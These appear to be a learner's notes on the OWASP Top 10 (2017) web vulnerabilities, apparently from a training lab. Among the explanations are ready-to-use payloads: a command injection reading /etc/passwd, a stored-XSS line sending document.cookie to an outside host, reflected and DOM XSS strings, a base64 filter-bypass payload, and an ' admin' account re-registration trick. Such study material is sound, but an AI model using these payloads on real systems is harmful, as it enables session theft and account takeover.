OWASP TOP 10 (2017)
https://cheatsheetseries.owasp.org/IndexTopTen.html
Injection
Command Injection
Blind Injection does not provide command output
Active Injection provides a response to the user
Example: evilshell.php?commandString=cat /etc/passwd
Wildcard Injection
For example when an elevated program is calling for wildcard * you can abuse this by finding ways to complete a valid command for that program through the wildcard iterations. More info on this page specific to wildcard injection.
Broken Authentication
Brute Force Attacks
Weak Credentials
Weak Session Cookies
Sometimes you may even be able to re-register an existing account and getting their privileges by creating something with username " admin" (with space at beginning).
Sensitive Data Exposure
Having sensitive data such as usernames or passwords in HTML comments, or flat-file databases available to be downloaded in whole.
XML External Entity
Insecure managing of XML payloads can possibly give you Local File Inclusion (LFI). Example on the XXE page.
Broken Access Control
IDOR (Insecure Direct Object Reference) is a common way to test for broken access control. In essence being able to change a parameter on the client side would provide you with data from a different user since the web app is not configured with correct access controls.
note.php?note=1 for you
note.php?note=0 shows somebody else's noteSecurity Misconfiguration
Poorly configured permissions on cloud services, like S3 buckets
Having unnecessary features enabled, like services, pages, accounts or privileges
Default accounts with unchanged passwords (most common)
Error messages that are overly detailed and allow an attacker to find out more about the system
Not using HTTP security headers, or revealing too much detail in the Server: HTTP header
Cross-site Scripting (XSS)
Stored XSS - the most dangerous type of XSS. This is where a malicious string originates from the website’s database. This often happens when a website allows user input that is not sanitised (remove the "bad parts" of a users input) when inserted into the database.
<img src=x onerror="this.src='http://10.6.104.9/collect.gif?'+document.cookie; this.removeAttribute('onerror');"><img src=x onerror=alert('XSS');>
Reflected XSS - the malicious payload is part of the victims request to the website. The website includes this payload in response back to the user. To summarise, an attacker needs to trick a victim into clicking a URL to execute their malicious payload.
reflected?keyword=<script>alert(“Hello”)</script>reflected?keyword=<script>alert(window.location.hostname)</script>
DOM-Based XSS - DOM stands for Document Object Model and is a programming interface for HTML and XML documents. It represents the page so that programs can change the document structure, style and content. A web page is a document and this document can be either displayed in the browser window or as the HTML source.
<script>document.getElementById("thm-title").textContent="I am able to change the title";</script>http://10.10.33.108/dom#img-url=test" onmouseover="alert(document.cookie)"
Bypass XSS Filters
<embed src="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg=="></embed>https://github.com/ihebski/XSS-Payloads
Insecure Deserialization
Using user provided data without sanitizing properly (mostly). For example changing cookies that give you admin access, or changing cookies to give reverse shell access.
Components with Known Vulnerabilities
Vulnerable applications which are well-known and have ready-made exploits on places such as exploit-db.com
Insufficient Logging & Monitoring
Last updated